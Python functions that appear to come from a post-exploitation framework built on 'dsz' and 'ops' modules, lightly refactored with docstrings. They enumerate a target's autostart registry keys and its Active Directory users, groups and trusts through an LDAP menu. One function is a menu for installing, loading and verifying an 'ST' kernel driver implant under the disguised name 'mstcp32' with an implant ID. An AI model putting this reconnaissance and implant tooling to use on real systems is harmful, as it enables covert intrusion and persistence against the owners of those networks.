def main():
    """Query a fixed set of HKLM autostart/extension-point registry keys.

    Runs ``registryquery`` against the local-machine hive (``-hive L``) for
    the Winsock helper DLL, AppInit_DLLs and the Run/RunOnce/RunOnceEx keys
    with echo turned on, then dispatches the Winlogon and CentralProcessor
    queries as ``background`` jobs with echo off. All of these are locations
    defenders normally baseline and monitor, because they are well-known
    auto-start extensibility points.
    """
    # Presumably a scope object that restores dsz control settings when the
    # function returns; kept bound for the whole function - confirm against
    # dsz.control.Method.
    _control_scope = dsz.control.Method()
    ops.preload('registryquery')
    ops.info('Registry checks')

    # Foreground queries: results are echoed to the operator.
    foreground_queries = (
        'registryquery -hive L -key "SYSTEM\\currentcontrolset\\services\\tcpip\\parameters\\winsock" -value HelperDLLName',
        # NOTE(review): the doubled separator before "windows" (``\\\\`` in the
        # literal) looks like a typo; preserved here because this rewrite is
        # behaviour-preserving.
        'registryquery -hive L -key "software\\microsoft\\windows nt\\currentversion\\\\windows" -value AppInit_Dlls',
        'registryquery -hive L -key "software\\microsoft\\windows\\currentversion\\run"',
        'registryquery -hive L -key "software\\microsoft\\windows\\currentversion\\runonce"',
        'registryquery -hive L -key "software\\microsoft\\windows\\currentversion\\runonceex"',
    )
    dsz.control.echo.On()
    for command in foreground_queries:
        dsz.cmd.Run(command)
    dsz.control.echo.Off()

    # Background queries: echo is already off, so nothing is printed here.
    ops.info('Querying winlogon and processor keys in the background.')
    background_queries = (
        'background registryquery -hive L -key "software\\microsoft\\windows nt\\currentversion\\winlogon"',
        'background registryquery -hive L -key "HARDWARE\\DESCRIPTION\\System\\CentralProcessor" -recursive',
    )
    for command in background_queries:
        dsz.cmd.Run(command)
def _actual_execute(self):
    """Run this command through dsz and store the outcome on the instance.

    The command line is ``str(self)``. When ``self.dszquiet`` is set, dsz
    echo is switched off first. If an ``OPS_SAFE_<plugin>`` environment
    variable exists, the command is prefixed with ``stopaliasing``
    (semantics of that prefix are not visible here). The plugin is
    preloaded unless the command is quiet or the plugin is listed in
    ``NEVER_PRELOAD``. Recording (``dsz.RUN_FLAG_RECORD``) is on unless
    ``self.norecord`` is set.

    Side effects: sets ``self.__success``, ``self.__channel`` and
    ``self.__result``; when ``self.autocache`` is set, the result object is
    saved to the volatile db and stamped with ``cache_timestamp``.

    Returns:
        The dsz result object, or ``None`` if fetching it raised
        ``ImportError``. Any other exception propagates to the caller.
    """
    if self.dszquiet:
        # Presumably a scope object that restores echo on return; bound to a
        # local so it lives for the rest of the call - confirm against
        # dsz.control.Method.
        x = dsz.control.Method()
        dsz.control.echo.Off()
    cmdstr = str(self)
    if (ops.env.get(('OPS_SAFE_%s' % self.plugin)) is not None):
        cmdstr = ('stopaliasing ' + cmdstr)
    if ((not self.dszquiet) and (self.plugin not in NEVER_PRELOAD)):
        ops.preload(self.plugin)
    # Record by default; norecord disables all run flags.
    dszflag = dsz.RUN_FLAG_RECORD
    if self.norecord:
        dszflag = 0
    # Taken before the run so the cache stamp reflects when the command started.
    timestamp = datetime.datetime.now()
    (success, cmdid) = dsz.cmd.RunEx(cmdstr, dszflag)
    self.__success = success
    self.__channel = cmdid
    self.__result = None
    try:
        self.__result = ops.data.getDszObject(cmdid=cmdid)
        if self.autocache:
            ops.db.get_voldb().save_ops_object(self.__result)
            # NOTE(review): nesting reconstructed from a single-line paste;
            # confirm this stamp belongs inside the autocache branch.
            self.__result.__dict__['cache_timestamp'] = timestamp
        return self.__result
    except ImportError:
        # Only ImportError is swallowed; the partially-set state above remains.
        return None
def main():
    """Query well-known HKLM autostart registry locations on the target.

    With echo on, runs ``registryquery`` for the Winsock HelperDLLName value,
    the AppInit_Dlls value and the Run, RunOnce and RunOnceEx keys; then, with
    echo off, queues ``background`` queries for the Winlogon key and the
    CentralProcessor subtree. These keys are standard persistence and
    extension points that defenders baseline and watch for changes.
    """
    # Presumably a scope object restoring dsz control state on return - kept
    # bound until the function exits; TODO confirm against dsz.control.Method.
    _scope = dsz.control.Method()
    ops.preload('registryquery')
    ops.info('Registry checks')

    hklm_query = 'registryquery -hive L -key "%s"'
    echoed = (
        hklm_query % 'SYSTEM\\currentcontrolset\\services\\tcpip\\parameters\\winsock' + ' -value HelperDLLName',
        # NOTE(review): ``\\\\`` yields a doubled separator before "windows";
        # likely a typo, preserved to keep behaviour identical.
        hklm_query % 'software\\microsoft\\windows nt\\currentversion\\\\windows' + ' -value AppInit_Dlls',
        hklm_query % 'software\\microsoft\\windows\\currentversion\\run',
        hklm_query % 'software\\microsoft\\windows\\currentversion\\runonce',
        hklm_query % 'software\\microsoft\\windows\\currentversion\\runonceex',
    )
    dsz.control.echo.On()
    for command in echoed:
        dsz.cmd.Run(command)
    dsz.control.echo.Off()

    ops.info('Querying winlogon and processor keys in the background.')
    queued = (
        'background ' + hklm_query % 'software\\microsoft\\windows nt\\currentversion\\winlogon',
        'background ' + hklm_query % 'HARDWARE\\DESCRIPTION\\System\\CentralProcessor' + ' -recursive',
    )
    for command in queued:
        dsz.cmd.Run(command)
def main():
    """Present an interactive "dsquery"-style LDAP menu.

    Builds the attribute lists each canned query should request, registers
    configuration toggles (print to disk/screen, minimal output, target
    address, safety limit) and the query/search entries, then runs the menu
    until option 0 is selected. The callbacks (``runldap``, ``querycomps``,
    ``queryusers``, ``querygroups``, ``queryuserbygroup``, ``manual``) are
    defined elsewhere in this file.

    Returns:
        int: 0 once the menu exits.
    """
    # LDAP filter string -> attributes requested for that filter. Keys are the
    # exact filter strings passed to the query callbacks below.
    attr_want_dict = {
        'objectCategory=computer': [
            'cn', 'description', 'displayname', 'name', 'whenCreated',
            'whenChanged', 'lastLogon', 'logonCount', 'operatingSystem',
            'operatingSystemVersion', 'operatingSystemServicePack',
            'dNSHostName',
        ],
        # NOTE(review): 'logonCount' is listed twice here; kept as in the
        # original since this rewrite is behaviour-preserving.
        '(&(objectCategory=Person)(objectClass=User))': [
            'cn', 'givenName', 'displayName', 'name', 'whenCreated',
            'whenChanged', 'lastLogon', 'logonCount', 'badPwdCount',
            'pwdLastSet', 'badPasswordTime', 'lastLogonTimestamp',
            'accountExpires', 'logonCount', 'managedObjects', 'memberOf',
        ],
        'objectClass=group': ['distinguishedName', 'description', 'memberOf'],
        '(|(objectClass=site)(objectCategory=organizationalUnit)(objectCategory=domainDNS))': [
            'canonicalName', 'distinguishedName', 'gPLink',
        ],
        '(|(objectCategory=organizationalUnit)(objectCategory=domainDNS))': [
            'canonicalName', 'distinguishedName', 'gPLink',
        ],
        'objectClass=PrintQueue': ['distinguishedName', 'serverName', 'driverName'],
        'objectClass=rRASAdministrationConnectionPoint': [
            'distinguishedName', 'whenCreated', 'whenChanged',
        ],
        'objectClass=site': ['distinguishedName', 'whenCreated', 'whenChanged'],
        'objectClass=trustedDomain': [
            'distinguishedName', 'trustDirection', 'trustType', 'flatName',
        ],
        'objectCategory=organizationalUnit': [
            'distinguishedName', 'description', 'whenCreated', 'whenChanged',
        ],
    }

    ops.preload('ldap')
    ds_menu = ops.menu.Menu()

    # Heading: the title boxed between two rules of matching width.
    title = '=========== Dsquery (ldap) ==========='
    rule = '=' * len(title)
    ds_menu.set_heading('\n'.join((rule, title, rule)))

    # Configuration section: toggles plus target address and safety limit.
    for option, state in (('Print to disk', 'Enabled'),
                          ('Print to screen', 'Disabled'),
                          ('Minimal', 'Disabled')):
        ds_menu.add_toggle_option(option=option, section='Configuration',
                                  state=state, enabled='Enabled',
                                  disabled='Disabled')
    ds_menu.add_ipv4_option(option='Target', section='Configuration', ip='127.0.0.1')
    ds_menu.add_int_option(option='Safety', section='Configuration', state=100)

    # Canned queries: (menu label, LDAP filter, query name handed to runldap).
    canned_queries = (
        ('Query computers', 'objectCategory=computer', 'Query_computers'),
        ('Query users', '(&(objectCategory=Person)(objectClass=User))', 'Query_users'),
        ('Query groups', 'objectClass=group', 'Query_groups'),
        ('Query audit policy w/ sites (logs to GC server)',
         '(|(objectClass=site)(objectCategory=organizationalUnit)(objectCategory=domainDNS))',
         'Query_audit_policy_with_sites'),
        ('Query audit policy w/o sites',
         '(|(objectCategory=organizationalUnit)(objectCategory=domainDNS))',
         'Query_audit_policy_without_sites'),
        ('Query printers', 'objectClass=PrintQueue', 'Query_printers'),
        ('Query rras', 'objectClass=rRASAdministrationConnectionPoint', 'Query_rras'),
        ('Query sites (logs to GC server)', 'objectClass=site', 'Query_sites'),
        ('Query trusts', 'objectClass=trustedDomain', 'Query_trusts'),
        ('Query organizational units', 'objectCategory=organizationalUnit',
         'Query_organizational_units'),
    )
    for label, ldap_filter, query_name in canned_queries:
        ds_menu.add_option(option=label, section='Default Queries',
                           callback=runldap, filter=ldap_filter, menu=ds_menu,
                           attr_want_dict=attr_want_dict, query=query_name)

    # Searches: each has its own callback and no fixed filter.
    searches = (
        ('Search for computers', querycomps, 'Search_for_computers'),
        ('Search for users', queryusers, 'Search_for_users'),
        ('Search for groups', querygroups, 'Search_for_groups'),
        ('Search for users by group', queryuserbygroup, 'Search_for_users_by_group'),
    )
    for label, callback, query_name in searches:
        ds_menu.add_option(option=label, section='Default Searches',
                           callback=callback, menu=ds_menu,
                           attr_want_dict=attr_want_dict, query=query_name)

    ds_menu.add_option(option='Manual ldap query', section='Advanced',
                       callback=manual, menu=ds_menu)

    ds_menu.execute(exiton=[0], default=0)
    return 0
def main():
    """Run the ST driver installation menu.

    Preloads the dsz plugins the menu callbacks depend on, aborts with an
    error (returning 0) when the target is pre-Windows 2000, 64-bit, or
    Vista or later, and otherwise offers install/load/verify/uninstall
    actions. The action callbacks (``install``, ``load``, ``verifyinstalled``,
    ``verifyrunning``, ``uninstall``, ``unload``), ``getimplantID`` and
    ``stVersion`` are defined elsewhere in this file. The menu's default
    driver name is ``mstcp32``; a driver or service registered under that
    name is the kind of artifact a defender would look for when hunting.
    """
    for plugin in ('registryquery', 'drivers', 'put', 'matchfiletimes',
                   'registryadd', 'registrydelete', 'delete'):
        ops.preload(plugin)

    # Platform guards, evaluated lazily in the original order so the first
    # failing check is the only one that runs.
    guards = (
        (lambda: not dsz.version.checks.windows.Is2000OrGreater(),
         'Target is pre Windows 2000! Cannot install, educate yourself'),
        (lambda: dsz.version.checks.IsOs64Bit(),
         'Target is x64! Cannot install, educate yourself'),
        (lambda: dsz.version.checks.windows.IsVistaOrGreater(),
         'Target is Vista+! Cannot install, educate yourself'),
    )
    for unsupported, message in guards:
        if unsupported():
            dsz.ui.Echo(message, dsz.ERROR)
            return 0

    st_menu = ops.menu.Menu()
    implantid = getimplantID()
    drivername = 'mstcp32'
    st_menu.set_heading('ST %s installation menu' % stVersion)
    st_menu.add_str_option(option='Driver Name', section='Configuration', state=drivername)
    st_menu.add_hex_option(option='Implant ID', section='Configuration', state=implantid)

    # (menu label, section, callback); every callback receives the menu.
    actions = (
        ('Install Driver', 'Installation', install),
        ('Load Driver', 'Installation', load),
        ('Verify Installation', 'Installation', verifyinstalled),
        ('Verify Running', 'Installation', verifyrunning),
        ('Uninstall ST', 'Uninstall', uninstall),
        ('Unload Driver', 'Uninstall', unload),
    )
    for label, section, callback in actions:
        st_menu.add_option(option=label, section=section, callback=callback,
                           passed_menu=st_menu)

    st_menu.execute(exiton=[0], default=0)
def main():
    """Preload and run the ``language`` command with echo enabled.

    Announces the query via ``ops.info`` before running it so the operator
    sees both the notice and the command's echoed output.
    """
    command = 'language'
    ops.preload(command)
    # Presumably a scope object restoring dsz control state on return; kept
    # bound for the function's lifetime - TODO confirm against dsz.control.Method.
    _scope = dsz.control.Method()
    dsz.control.echo.On()
    ops.info('Querying language')
    dsz.cmd.Run(command)